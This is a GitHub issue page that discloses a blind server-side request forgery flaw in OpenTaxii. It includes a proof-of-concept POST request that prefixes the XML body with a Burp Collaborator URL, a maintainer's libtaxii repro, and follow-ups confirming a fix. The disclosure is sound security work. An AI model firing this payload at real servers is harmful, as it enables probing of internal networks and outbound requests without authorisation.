-
Notifications
You must be signed in to change notification settings - Fork 86
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Blind SSRF in OpenTaxii #176
Comments
@0wa1s thank you for this awesome find! I've reproduced the issue and narrowed it down to from libtaxii.common import parse
parse("http://test-domain.local?junkdata") will trigger a GET request to The call to I've made an issue for libtaxii project |
A fix has been made available on version |
Confirmative, fixed in Thank you all :) |
Hi,
I and my colleague (Vijay Kota) were testing the opentaxii locally deployed instance and found that it is vulnerable to SSRF issue which can be exploited by adding http://<burp_collaborator>?
Sample POC:
POST /services/discovery HTTP/1.1
Host: 127.0.0.1:9000
Connection: close
Accept-Encoding: gzip, deflate
Accept: application/xml
User-Agent: Cabby 0.1.20
X-TAXII-Accept: urn:taxii.mitre.org:message:xml:1.1
X-TAXII-Services: urn:taxii.mitre.org:services:1.1
X-TAXII-Content-Type: urn:taxii.mitre.org:message:xml:1.1
X-TAXII-Protocol: urn:taxii.mitre.org:protocol:https:1.0
Content-Type: application/xml
Content-Length: 339
http://ig2vjheeqdul2zwfbfxo31ngk7qxem.burpcollaborator.net?<taxii_11:Discovery_Request xmlns:taxii="http://taxii.mitre.org/messages/taxii_xml_binding-1" xmlns:taxii_11="http://taxii.mitre.org/messages/taxii_xml_binding-1.1" xmlns:tdq="http://taxii.mitre.org/query/taxii_default_query-1" message_id="877a5f67-6616-4040-bbc1-5f36efd5a349"/>
The text was updated successfully, but these errors were encountered: